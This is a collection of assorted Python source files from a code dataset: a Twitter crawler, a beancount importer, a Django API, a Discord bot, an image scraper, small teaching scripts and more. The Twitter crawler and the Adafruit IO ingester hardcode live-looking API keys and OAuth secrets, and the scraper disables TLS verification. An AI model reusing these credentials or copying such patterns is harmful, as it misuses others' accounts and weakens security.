[test_tfrecords_file],\n lambda paths: 0)\n\n # Create tfrecords fmeta file for train , validation and test data\n\n create_tfrecords_meta_file(num_train_examples, num_val_examples, num_test_examples,\n tfrecords_meta_file)\n\n print ('Completed processing')\n\n\nif __name__ == '__main__':\n tf.app.run(main=main)\n","sub_path":"Project/project_LAP/project_LAP/Multi_digit_recognition/create_tfrecords.py","file_name":"create_tfrecords.py","file_ext":"py","file_size_in_byte":8986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"296010919","text":"import turtle\ns = turtle.getscreen()\nt = turtle.Turtle()\nT = turtle.title('Shape maker dumb')\nt.pensize(5)\nturtle.bgcolor('black')\nt.fillcolor(\"white\")\nt.pencolor('white')\na = 0\nt.begin_fill()\nwhile a <= 2:\n a = int(input('What sided shape? '))\nfor i in range(1,a+1):\n if a > 5:\n if i%2 == 1:\n t.pencolor('white')\n else:\n t.pencolor('black')\n L = 180*(a-2)\n if a >= 10:\n t.fd(50/(a//10))\n else:\n t.fd(50)\n t.lt(180-(L/a))\nt.end_fill()\nt.penup()\nt.color('black','black')\nt.fd(-100)\n","sub_path":"tutle.py","file_name":"tutle.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"576151863","text":"import re, time\nimport graphmanager as graph\nfrom instagram import client\nfrom crawler import Crawler\nfrom httplib2 import ServerNotFoundError\nimport tweepy\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\n\n# constant storing the social network type\nSN = 'TW'\n\nMAX_ID_REGEX = re.compile(r'max_id=([^&]+)')\nCURSOR_REGEX = re.compile(r'cursor=([^&]+)')\n\n\n#####TWITTER KEYS#####\nCONSUMER_KEY = 'ieZUZgZrSJJE0QLBBOsgXg'\nCONSUMER_SECRET = 'PlIpSrh6unKYZISSDieBIFAB3D9f6aSh4p4Dmcn8Q'\nOAUTH_TOKEN = '1015949947-0Akq5OBnEzTp7OwaIuvLNiKN6L52FNLVOW9yIyf'\nOAUTH_TOKEN_SECRET = 'SJz3nXcyGt2lIKhmPiFg5VlTdHLbrRSPRRgUZ552xfe1e'\n####Twitter auth handler####\nauth = OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)\nauth.set_access_token(OAUTH_TOKEN,OAUTH_TOKEN_SECRET)\napi = tweepy.API(auth)\n\nclass twitterCrawler(Crawler):\n def __init__(self, social_network):\n super(twitterCrawler, self).__init__(social_network)\n\n def get_first_user(self):\n '''Get the first user to init the graph.'''\n # entry point to the graph: a user named smhopeless\n # this guy is a music producer from pamplona\n seed_user_id = 79708782\n # create first user and add him to the graph\n # get user info from Instagram\n retry = True\n while retry:\n try:\n time.sleep(0.7)\n user_info = api.get_user(seed_user_id)\n except ServerNotFoundError as e:\n retry = True\n retry = False\n # create first user\n user = graph.User(\n social_network=self.social_network, \n external_id=user_info.id, \n username=user_info.screen_name, \n url='http://twitter.com/' + user_info.screen_name, \n completed=False\n )\n return user\n\n def get_user_profile(self, user):\n '''Get user profile.'''\n # add user profile to the graph as a resource\n retry = True\n while retry:\n try:\n time.sleep(0.7)\n user_info = api.get_user(user.external_id)\n retry = False\n except ServerNotFoundError as e:\n retry = True\n except:\n return None\n if user_info.description is not None:\n raw_content = user_info.description\n if user_info.url:\n raw_content += ' ' + user_info.url\n\n # create user profile resource and add it to the graph\n resource = graph.Resource(\n social_network=user.social_network,\n external_id=user.external_id,\n url='http://twitter.com/' + user.username,\n raw_content=raw_content,\n location_name=None,\n location_lat=None,\n location_lon=None\n )\n return resource\n else:\n return None\n\n def get_user_resources(self, user):\n '''Get resources from the user.'''\n resources = []\n max_id = ''\n while True:\n followees_page = []\n next = ''\n retry = True\n error = False\n while retry:\n try:\n time.sleep(0.7) # be nice with the API\n if max_id == '':\n recent_media = api.user_timeline(user_id=user.external_id, count=33)\n else:\n recent_media = api.user_timeline(user_id=user.external_id, max_id=max_id, count=33)\n retry = False\n except ServerNotFoundError as e:\n retry = True\n except:\n error = True\n break;\n\n if error:\n break;\n\n for media in recent_media:\n create_resource = False\n if hasattr(media, 'text') and media.text is not None:\n create_resource = True\n raw_content = media.text\n if hasattr(media, 'place') and media.place is not None:\n raw_content = raw_content + '. 
' + media.place.name\n elif hasattr(media, 'place') and media.place is not None:\n create_resource = True\n raw_content = media.place\n\n ###NUEVO\n if media.id==max_id:\n next=None\n else:\n max_id=media.id\n ####\n \n if create_resource:\n try:\n resource = graph.Resource(\n social_network=SN,\n external_id=media.id,\n url=\"https://twitter.com/\"+media.user.screen_name+\"/status/\"+str(media.id),\n raw_content=raw_content,\n location_name=media.user.location,\n location_lat=None,\n location_lon=None\n )\n#,location_lat=media.location.point.latitude,\n # location_lon=media.location.point.longitude\n\n except AttributeError:\n resource = graph.Resource(\n social_network=SN,\n external_id=media.id,\n url=\"https://twitter.com/\"+media.user.screen_name+\"/status/\"+str(media.id),\n raw_content=raw_content,\n location_name=None,\n location_lat=None,\n location_lon=None\n )\n if resource is not None:\n resources.append(resource)\n\n\n\n if next is None:\n break\n \"\"\"else:\n # get max_id param for the next page of results\n max_id_matcher = MAX_ID_REGEX.search(next)\n if max_id_matcher is not None:\n max_id = max_id_matcher.group(1)\n else:\n break\"\"\"\n return resources\n\n def get_user_followees(self, user):\n '''Get all people that this user follows.'''\n followees = []\n cursor = -1\n while True:\n followees_page = []\n next = ''\n retry = True\n error = False\n while retry:\n try:\n time.sleep(0.7) # be nice with the API\n \n followees_page = api.get_user(user_id=user.external_id).friends(cursor=cursor)\n retry = False\n except ServerNotFoundError as e:\n retry = True\n except:\n error = True\n break;\n\n if error:\n break;\n ###Nuevo\n #>>> us.friends(cursor=-1)[1]\n #(0, 1460009616470583290L) si el segundo campo sale 0 es que no hay mas paginas\n if followees_page[1][1]!=0:\n cursor+=1\n else:\n next=None\n ###\n for user_info in followees_page[0]:\n followee = graph.User(\n social_network=SN, \n external_id=user_info.id, \n username=user_info.screen_name, \n url='http://twitter.com/' + user_info.screen_name,\n completed=False\n )\n followees.append(followee)\n\n if next is None:\n break\n \n return followees\n\n# let's crawl Instagram!\ntwitterCrawler(SN).run()\n","sub_path":"twitterCrawler.py","file_name":"twitterCrawler.py","file_ext":"py","file_size_in_byte":7736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"190363871","text":"import csv\nfrom datetime import datetime\nimport locale\nimport re\n\nfrom beancount.core.amount import Amount\nfrom beancount.core import data\nfrom beancount.core.number import Decimal\nfrom beancount.ingest import importer\n\nfrom ._common import change_locale, InvalidFormatError\n\n\nFIELDS = (\n 'Buchungstag',\n 'Wertstellung',\n 'Buchungstext',\n 'Auftraggeber / Begünstigter',\n 'Verwendungszweck',\n 'Kontonummer',\n 'BLZ',\n 'Betrag (EUR)',\n 'Gläubiger-ID',\n 'Mandatsreferenz',\n 'Kundenreferenz',\n)\n\n\nclass ECImporter(importer.ImporterProtocol):\n def __init__(self, iban, account, currency='EUR',\n numeric_locale='de_DE.UTF-8', file_encoding='utf-8'):\n self.account = account\n self.currency = currency\n self.numeric_locale = numeric_locale\n self.file_encoding = file_encoding\n\n self._expected_header_regex = re.compile(\n r\"^\\\"Kontonummer:\\\";\\\"\" +\n re.escape(re.sub(r\"\\s+\", \"\", iban, flags=re.UNICODE)) + \"\\s\",\n re.IGNORECASE\n )\n self._date_from = None\n self._date_to = None\n self._balance = None\n\n def file_account(self, _):\n return self.account\n\n def file_date(self, file_):\n self.extract(file_)\n return self._date_to\n\n def identify(self, file_):\n with open(file_.name, encoding=self.file_encoding) as fd:\n line = fd.readline().strip()\n\n return self._expected_header_regex.match(line)\n\n def extract(self, file_):\n entries = []\n line_index = 0\n closing_balance_index = -1\n\n with change_locale(locale.LC_NUMERIC, self.numeric_locale):\n with open(file_.name, encoding=self.file_encoding) as fd:\n # Header\n line = fd.readline().strip()\n line_index += 1\n\n if not self._expected_header_regex.match(line):\n raise InvalidFormatError()\n\n # Empty line\n line = fd.readline().strip()\n line_index += 1\n\n if line:\n raise InvalidFormatError()\n\n # Meta\n lines = [fd.readline().strip() for _ in range(3)]\n\n reader = csv.reader(lines, delimiter=';',\n quoting=csv.QUOTE_MINIMAL, quotechar='\"')\n\n for line in reader:\n key, value, _ = line\n line_index += 1\n\n if key.startswith('Von'):\n self._date_from = datetime.strptime(\n value, '%d.%m.%Y').date()\n elif key.startswith('Bis'):\n self._date_to = datetime.strptime(\n value, '%d.%m.%Y').date()\n elif key.startswith('Kontostand vom'):\n self._balance = Amount(\n locale.atof(value.rstrip(' EUR'), Decimal),\n self.currency)\n closing_balance_index = line_index\n\n # Another empty line\n line = fd.readline().strip()\n line_index += 1\n\n if line:\n raise InvalidFormatError()\n\n # Data entries\n reader = csv.DictReader(fd, delimiter=';',\n quoting=csv.QUOTE_MINIMAL,\n quotechar='\"')\n\n for line in reader:\n meta = data.new_metadata(file_.name, line_index)\n\n amount = None\n if line['Betrag (EUR)']:\n amount = Amount(locale.atof(line['Betrag (EUR)'],\n Decimal),\n self.currency)\n date = datetime.strptime(\n line['Buchungstag'], '%d.%m.%Y').date()\n\n if line['Verwendungszweck'] == 'Tagessaldo':\n if amount:\n entries.append(\n data.Balance(meta, date, self.account, amount,\n None, None)\n )\n else:\n description = '{} {}'.format(\n line['Buchungstext'],\n line['Verwendungszweck']\n )\n\n postings = [\n data.Posting(self.account, amount, None, None,\n None, None)\n ]\n\n entries.append(\n data.Transaction(\n meta, date, self.FLAG,\n line['Auftraggeber / Begünstigter'],\n description, data.EMPTY_SET, data.EMPTY_SET,\n postings\n )\n )\n\n line_index += 1\n\n # Closing Balance\n meta = data.new_metadata(file_.name, closing_balance_index)\n entries.append(\n 
data.Balance(meta, self._date_to, self.account,\n self._balance, None, None)\n )\n\n return entries\n","sub_path":"beancount_dkb/ec.py","file_name":"ec.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"473099382","text":"import os\nimport requests\nfrom requests.packages.urllib3.exceptions import *\nfrom lxml import etree\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36'\n}\npage_num = input('(动漫图片小爬虫)请输入你要爬取的页数(不超过8):')\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\ndir = os.getcwd()\nprint(dir)\nif not os.path.exists(dir +'\\\\动漫图片'):\n path = os.makedirs(dir + '\\\\动漫图片')\n print('已创建文件夹[动漫图片]......')\nelse:\n pass\n\npage = 0\nwhile page != int(page_num):\n session = requests.session()\n page = page + 1\n url = 'https://acg18.life/category/picture/normal/page/'+ str(page)\n print('第'+str(page)+'页链接:'+url)\n html = session.get(url,headers = headers,verify=False).text\n html = etree.HTML(html)\n titlelist = html.xpath('//ul[@class=\"posts-ul\"]//h2/a/text()')\n hreflist = html.xpath('//ul[@class=\"posts-ul\"]//h2/a/@href')\n print(hreflist)\n for title,href in zip(titlelist,hreflist):\n print('正在下载此链接所有图册:'+href +title)\n try:\n html = requests.get(href,headers = headers,verify = False).text\n except:\n continue\n html = etree.HTML(html)\n hreflist = html.xpath('//div[@class=\"entry\"]//@lazydata-src')\n i = 0\n for href in hreflist:\n try:\n res = session.get(href,headers = headers,verify=False).content\n except:\n continue\n i = i+1\n dirname = title.replace('/','')\n if not os.path.exists(dir + '\\\\动漫图片\\\\' + dirname):\n path = os.makedirs(dir + '\\\\动漫图片\\\\' + dirname)\n print('已创建文件夹[' + dirname+']......')\n else:\n pass\n filename = dir + '\\\\动漫图片\\\\' + dirname +'\\\\' + title.replace('/','') + href.split('/')[-1]\n if not os.path.exists(filename):\n with open(filename,'wb') as f:\n f.write(res)\n print(href+'下载完成......')\n else:\n continue\n\n print('此链接所有图册:' + href + title + \"下载完成......\\n\")\n","sub_path":"幻想次元二次元图包下载器/幻想次元网站图包下载器.py","file_name":"幻想次元网站图包下载器.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"614276808","text":"import pyperclip\r\nimport re\r\nimport os\r\n\r\nSAVEPATH = 'result.txt'\r\n\r\n\r\nwhile True:\r\n try:\r\n input('Enter to edit text copied in clipboard')\r\n text = pyperclip.paste().encode(\"ascii\", errors=\"ignore\").decode()\r\n regex = input('Enter regex to find: ')\r\n replace = input('Enter text to replace: ')\r\n file = open(SAVEPATH, 'w')\r\n file.write(re.sub(regex, replace, text))\r\n file.close()\r\n os.startfile(SAVEPATH)\r\n except Exception as e:\r\n print(e)","sub_path":".Projects/Python/replaceRegex/replaceRegex.py","file_name":"replaceRegex.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"25044460","text":"#!/usr/bin/python3\nimport time\nimport requests\nfrom Adafruit_IO import Client\n\naio = Client('MonkeyCanCode', '3c49549385104947bae4e60d5db5a060')\n\nwhile True:\n\tprint(\"Ingest data into io.adafruit.com...\")\n\tr = requests.get('https://thingspeak.com/channels/698947/feeds.json?key=PIGU600LAG50NJ3T&results=10')\n\tfor row in r.json()['feeds']:\n\t\tfeed = aio.feeds('pressure')\n\t\taio.send_data(feed.key, float(row['field1']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('altitude')\n\t\taio.send_data(feed.key, float(row['field2']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('concentration')\n\t\taio.send_data(feed.key, float(row['field3']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('light')\n\t\taio.send_data(feed.key, float(row['field4']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('humidity')\n\t\taio.send_data(feed.key, float(row['field5']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('temp')\n\t\taio.send_data(feed.key, float(row['field6']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('vsig')\n\t\taio.send_data(feed.key, float(row['field7']))\n\t\ttime.sleep(2)\n\t\tfeed = aio.feeds('bpm')\n\t\taio.send_data(feed.key, float(row['field8']))\n\t\ttime.sleep(2)\n\tprint(\"Ingest data into io.adafruit.com completed\")\n\ttime.sleep(60)\n","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"105453950","text":"from .serializers import DepartmentSerializer, RegistrationDataSerializer, HRRegistrationSerailizer, EmployeUpdateSerializer\nfrom rest_framework import viewsets, mixins\nfrom .models import User, Department\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.response import Response\nfrom rest_framework.authtoken.models import Token\nfrom django.db.models import Q\nfrom rest_framework.pagination import PageNumberPagination\nfrom project.custom_permission import IsHREmployee\n\nclass CustomAuthToken(ObtainAuthToken):\n \"\"\"\n custom auth token\n \"\"\"\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data,\n context={'request': request})\n print(serializer)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n print(user)\n token, created = Token.objects.get_or_create(user=user)\n user = User.objects.get(pk=user.id)\n print(user)\n response = {\n \"data\": {\n 'token': token.key,\n 'user_id': user.pk,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'email': user.email,\n }\n }\n response['status'] = {\"status\": \"User logged in successfully.\"}\n return Response(response)\n\n\nclass DepartmentApi(viewsets.ModelViewSet):\n '''\n Department Api for CRUD operation\n '''\n queryset = Department.objects.all()\n serializer_class = DepartmentSerializer\n pagination_class = PageNumberPagination\n\n\nclass EmployeeDataApi(mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n viewsets.GenericViewSet):\n \"\"\"\n employee_address: we have to pass address objects in list like:\n [{\"address\": \"Gali no. 4\", \"country\": \"India\",\"city\": \"karnal\",\"zip\": 12345},\n {\"address\": \"casd\",\"country\": \"India\",\"city\": \"karnal\",\"zip\": 12345}]\n :return\n \"\"\"\n queryset = User.objects.filter(is_employee=True, is_active=True)\n serializer_class = RegistrationDataSerializer\n permission_classes = [IsAuthenticated, IsHREmployee]\n pagination_class = PageNumberPagination\n\n def get_serializer_class(self):\n serializer = RegistrationDataSerializer\n if self.action == 'update':\n serializer = EmployeUpdateSerializer\n return serializer\n\n def create(self, request, *args, **kwargs):\n serialized = self.serializer_class(data=request.data, context={'request': request})\n if serialized.is_valid(raise_exception=True):\n user = serialized.create(validated_data=serialized.data)\n serialized = self.serializer_class(user)\n response = serialized.data\n response['success_message_head'] = \"Successfully Created\"\n return Response(response, status=201)\n\n\nclass HRRegisterApi(mixins.CreateModelMixin,\n mixins.ListModelMixin,\n viewsets.GenericViewSet):\n '''HR Api to perform create and listing of HR'''\n queryset = User.objects.filter(is_hr=True, is_active=True)\n serializer_class = HRRegistrationSerailizer\n pagination_class = PageNumberPagination","sub_path":"hrm/project/accounts/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"131375436","text":"import discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport traceback\r\nimport asyncio\r\nfrom asyncio import sleep\r\n\r\nclass Utility():\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n\r\n\r\n @commands.command(aliases=['calc'])\r\n async def calculate(self, ctx, left: int, type, right: int):\r\n '''Calculate an equation\r\nEx:\r\n!?calculate [number] [ + | * | - | ^ | / ] [number]'''\r\n if type == '*':\r\n return await ctx.send(left * right)\r\n if type == '+':\r\n return await ctx.send(left + right)\r\n if type == '-':\r\n return await ctx.send(left - right)\r\n if type == '/':\r\n return await ctx.send(left / right)\r\n if type == '^':\r\n return await ctx.send(left ^ right)\r\n await ctx.send('Invalid equation')\r\n\r\n\r\n\r\n\r\n @commands.command()\r\n async def avatar(self, ctx, user: discord.Member=None):\r\n '''Get a member's avatar\r\nEx:\r\n!?avatar @kian_8x'''\r\n if user is None:\r\n user = ctx.author\r\n\r\n e = discord.Embed(description=f'[{user}\\'s avatar]( {user.avatar_url} )', color=discord.Colour.blurple())\r\n e.set_image(url=user.avatar_url)\r\n await ctx.send(embed=e)\r\n\r\n\r\n @commands.command()\r\n async def roles(self, ctx):\r\n '''Get the server roles'''\r\n a = discord.Embed(color=discord.Colour.blurple())\r\n a.add_field(name=f'Server roles [{len(ctx.guild.roles)}]', value=', '.join(g.name for g in ctx.guild.roles))\r\n await ctx.send(embed=a)\r\n\r\n\r\n @commands.command(aliases=['memberoles'])\r\n async def userroles(self, ctx, user: discord.Member=None):\r\n '''Get a user's roles\r\nEx:\r\n!?userroles @luke'''\r\n if user is None:\r\n user = ctx.author\r\n\r\n a = discord.Embed(color=discord.Colour.blurple())\r\n a.add_field(name=f'{user}\\'s roles [{len(ctx.author.roles)}]', value=', '.join(g.name for g in ctx.author.roles))\r\n await ctx.send(embed=a)\r\n\r\n\r\n @commands.command()\r\n async def userinfo(self, ctx, user: discord.Member=None):\r\n '''Get a user's info\r\nEx:\r\n!?userinfo @magazinsnow'''\r\n if user is None:\r\n user = ctx.author\r\n\r\n a = discord.Embed(color=discord.Colour.blurple())\r\n a.add_field(name='Name:', value=f'{user.name}')\r\n a.add_field(name='ID:', value=f\"{user.id}\")\r\n a.add_field(name='Bot:', value=f'{user.bot}')\r\n a.add_field(name='Discrim:', value=f'{user.discriminator}')\r\n a.add_field(name='Top Role', value=f'{user.top_role}')\r\n a.add_field(name=f'Roles [{len(user.roles)}]', value=', '.join(g.name for g in user.roles))\r\n a.set_thumbnail(url=user.avatar_url)\r\n await ctx.send(embed=a)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Utility(bot))\r\n","sub_path":"cogs/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"406536120","text":"import unittest\nimport numpy as np\nimport numpy.testing as npt\nfrom search.import_functions import (crop_to_square, normalize)\n\n\nclass TestSearch(unittest.TestCase):\n \n def test_crop_to_square(self):\n np.random.seed(0)\n test_slice = np.random.rand(91,109)\n square_slice = crop_to_square(test_slice)\n \n expected_slice = np.zeros((96,96))\n expected_slice[3:94,:] = test_slice[:,8:104]\n \n npt.assert_array_equal(square_slice, expected_slice)\n \n def test_normalize(self):\n np.random.seed(0)\n test_slice = np.random.rand(96,96)\n norm_slice = normalize(test_slice)\n \n expected_slice = (test_slice - np.mean(test_slice)) / np.std(test_slice)\n \n npt.assert_array_equal(norm_slice, expected_slice)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"tests/test_import_functions.py","file_name":"test_import_functions.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"16814806","text":"import random\r\nfrom tkinter import *\r\n\r\nanswers = [\"It is certain.\", \"It is decidedly so.\",\r\n           \"Without a doubt.\", \"Yes - definitely!\",\r\n           \"You may rely on it.\", \"As I see it, yes.\",\r\n           \"Most likely.\", \"Outlook good.\",\r\n           \"Yes.\", \"Signs point to yes.\",\r\n           \"Reply hazy, please try again.\", \"Ask again later.\",\r\n           \"Better not tell you now.\", \"Cannot predict now.\",\r\n           \"Concentrate and ask again.\", \"Don't count on it.\",\r\n           \"My reply is no.\", \"My sources say no.\",\r\n           \"Outlook not so good.\", \"Very doubtful.\"]\r\n\r\n\r\ndef submit():\r\n    question = ask_box.get()\r\n    message = \"You didn't ask anything!\"\r\n    if question:\r\n        # random.choice, not bare choice: only the random module is imported\r\n        message = random.choice(answers)\r\n    display(message)\r\n\r\ndef display(message):\r\n    ask_box.delete(0, END)\r\n    txt[\"state\"] = \"normal\"\r\n    txt.delete(0.0, END)\r\n    txt.insert(0.0, message)\r\n    txt[\"state\"] = \"disabled\"\r\n\r\n# set up the GUI\r\nroot = Tk()\r\napp = Frame(root)\r\napp.grid()\r\nroot.title(\"Magic 8 Ball\")\r\nroot.geometry(\"300x400\")\r\n\r\nask_lbl = Label(app, text=\"please ask a yes or no question\")\r\nask_lbl.grid(columnspan=3, pady=5, padx=10)\r\n\r\nask_box = Entry(app, width=30)\r\nask_box.grid(columnspan=3, pady=5, padx=10)\r\nask_box.focus_force()\r\n\r\nshake = Button(app, text=\"Shake the 8 Ball.\")\r\nshake[\"command\"] = submit\r\nshake.grid(column=1, pady=5)\r\n\r\ntxt = Text(app, width=30, height=3, wrap=WORD, state=DISABLED)\r\ntxt.grid(columnspan=3, pady=5, padx=5)\r\n\r\nroot.mainloop()\r\n\r\n# console version below; it only runs after the GUI window is closed\r\ndef ask_question():\r\n    question = input(\"Hello! Please ask a yes or no question.\")\r\n\r\n\r\ndef give_an_answer():\r\n    yes = [\"Definitely!\", \"Hopefully :)\", \"Surely!\", \"I am certain of it ;)\", \"Why not :)\"]\r\n    no = [\"That is impossible!\", \"Nope\", \"Surely not!\", \"Hell no!\"]\r\n    maybe = [\"Maybe\", \"It can go both ways...\", \"Hmm...You will need to figure this out yourself...\", \"idk\",\r\n             \"ask later...\", \"What kind of a question is that???\"]\r\n    number_of_yes = len(yes) - 1\r\n    number_of_no = len(no) - 1\r\n    number_of_maybe = len(maybe) - 1\r\n    random1or2or3 = random.randint(1, 3)\r\n    if random1or2or3 == 1:\r\n        x = random.randint(0, number_of_yes)\r\n        print(yes[x])\r\n    elif random1or2or3 == 2:\r\n        y = random.randint(0, number_of_no)\r\n        print(no[y])\r\n    elif random1or2or3 == 3:\r\n        z = random.randint(0, number_of_maybe)\r\n        print(maybe[z])\r\n\r\n\r\nwhile True:\r\n    ask_question()\r\n    give_an_answer()\r\n","sub_path":"LearningPython/FireTechCamp/Day3/Magic 8 ball.py","file_name":"Magic 8 ball.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"388352852","text":"# Resolve the problem!!\nimport re\n\n\ndef run():\n # Start coding here\n with open('src/encoded.txt', mode='r', encoding='utf-8') as f:\n result = ''.join(re.findall('[a-z]', f.read()))\n print(result)\n\nif __name__ == '__main__':\n run()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"269709443","text":"n_mes = int(input('n: '))\n# [] * 13 is just an empty list, so the indexed assignments below raised IndexError; preallocate instead\nlista = [None] * 13\nlista[0] = 'nada'\nlista[1] = 'Jan'\nlista[2] = 'Fev'\nlista[3] = 'Mar'\nlista[4] = 'Abril'\nlista[5] = 'Maio'\nlista[6] = 'Junho'\nlista[7] = 'julho'\nlista[8] = 'agosto'\nlista[9] = 'setembro'\nlista[10] = 'out'\nlista[11] = 'nov'\nlista[12] = 'dez'","sub_path":"backup/user_373/ch43_2020_04_13_05_57_09_465042.py","file_name":"ch43_2020_04_13_05_57_09_465042.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"191628759","text":"from django.contrib import admin\nfrom .models import Blog_news, Category, Information\nfrom tinymce.widgets import TinyMCE\nfrom django.db import models\n\nclass Blog_newsAdmin(admin.ModelAdmin):\n\tfields=('title', 'publieshed_date', 'text', 'image', 'urls_slung')\n\n\tformfield_overrides = {\n\t\t\tmodels.TextField: {'widget': TinyMCE(),},\n\t}\n\nclass Information_admin(admin.ModelAdmin):\n\tformfield_overrides = {\n\t\t\tmodels.TextField: {'widget': TinyMCE(),},\n\t}\n\n#\tfielsets=[\"\"]\nadmin.site.register(Blog_news, Blog_newsAdmin)\nadmin.site.register(Category)\nadmin.site.register(Information, Information_admin)","sub_path":"mainapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"306123272","text":"\n\nfrom xai.brain.wordbase.nouns._patchwork import _PATCHWORK\n\n# class header\nclass _PATCHWORKS(_PATCHWORK):\n\tdef __init__(self):\n\t\t_PATCHWORK.__init__(self)\n\t\tself.name = \"PATCHWORKS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"patchwork\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_patchworks.py","file_name":"_patchworks.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"206590897","text":"# -*- coding: utf-8 -*-\n\n# Perceptron algorithm\n\ndataSet = [\n    [0,0,0,1],\n    [1,0,0,1],\n    [1,0,1,1],\n    [1,1,0,1],\n    [0,0,-1,-1],\n    [0,-1,-1,-1],\n    [0,-1,0,-1],\n    [-1,-1,-1,-1],\n]\n\ndimension = 4\nW = [-1,-2,-2,0]\n\ndef getProduct(data, w):\n    print(\"calc\")\n    print(data)\n    print(w)\n    res = 0\n    for i in range(dimension):\n        res = res + data[i]*w[i]\n    print(res)\n    print()\n\n    return res\n\ndef updateW(data, w):\n    print(\"update\")\n    print(data)\n    print(w)\n    for i in range(dimension):\n        w[i] = w[i] + data[i]\n    print(w)\n    print()\n\nisChanged = True\nwhile(isChanged):\n    isChanged = False\n    for data in dataSet:\n        temp = getProduct(data, W)\n        if temp <= 0:\n            updateW(data, W)\n            isChanged = True\n","sub_path":"2019spring/AI/HW4/PML.py","file_name":"PML.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"48442241","text":"from sklearn.ensemble import RandomForestRegressor\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport numpy as np\nimport os\n\ndef set_missing_ages_mean(df):\n    '''fill missing ages with the mean age of the title group parsed from Name'''\n    # print('df : \\n', df)\n    age_df = df[['Name', 'Age', 'Fare', 'Parch', 'SibSp', 'Pclass']] # extract these columns from the dataframe\n\n    ###############################################\n    ##### use the title found in Name to replace unknown ages with the title-group mean #####\n    known_age = age_df[age_df.Age.notnull()]\n\n    unknown_age = age_df[age_df.Age.isnull()]\n    ### mean age for Mr.\n    known_age_Mr = known_age[known_age['Name'].str.contains('Mr\\\\.')]\n\n    unknown_age_Mr = unknown_age[unknown_age['Name'].str.contains('Mr\\\\.')]\n\n    unknown_age_Mr['Age'].fillna(known_age_Mr['Age'].mean(), inplace = True)\n\n    age_df.iloc[unknown_age_Mr.index.tolist(), :] = unknown_age_Mr\n\n    ### mean age for Mrs.\n    known_age_Mrs = known_age[known_age['Name'].str.contains('Mrs\\\\.')]\n\n    unknown_age_Mrs = unknown_age[unknown_age['Name'].str.contains('Mrs\\\\.')]\n\n    unknown_age_Mrs['Age'].fillna(known_age_Mrs['Age'].mean(), inplace = True)\n\n    age_df.iloc[unknown_age_Mrs.index.tolist(), :] = unknown_age_Mrs\n\n    ### mean age for Miss.\n    known_age_Miss = known_age[known_age['Name'].str.contains('Miss\\\\.')]\n\n    unknown_age_Miss = unknown_age[unknown_age['Name'].str.contains('Miss\\\\.')]\n\n    unknown_age_Miss['Age'].fillna(known_age_Miss['Age'].mean(), inplace = True)\n\n    age_df.iloc[unknown_age_Miss.index.tolist(), :] = unknown_age_Miss\n\n    ### mean age for 